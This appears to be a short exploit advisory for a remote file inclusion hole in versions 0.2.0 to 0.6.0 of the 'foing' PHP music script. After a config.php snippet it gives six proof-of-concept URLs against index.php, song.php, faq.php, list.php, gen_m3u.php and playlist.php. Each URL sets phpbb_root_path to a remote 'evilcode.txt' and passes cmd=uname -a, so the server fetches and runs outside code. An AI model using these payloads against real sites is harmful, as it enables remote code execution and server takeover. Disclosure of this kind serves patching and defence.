0.6.0
0.5.0
0.4.0
0.3.0
0.2.0
"Powered by foing 0.6.0 © 2003, 2004 Foing Group" etc..
Vulnerable code :
Get along at directory config.php
did you meet of …
<?php
define('FOING_INSTALLED', true);
$phpbb_root_path = '…/';
$foing_prefix = $table_prefix;
?>
Proof Of Concept :
http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a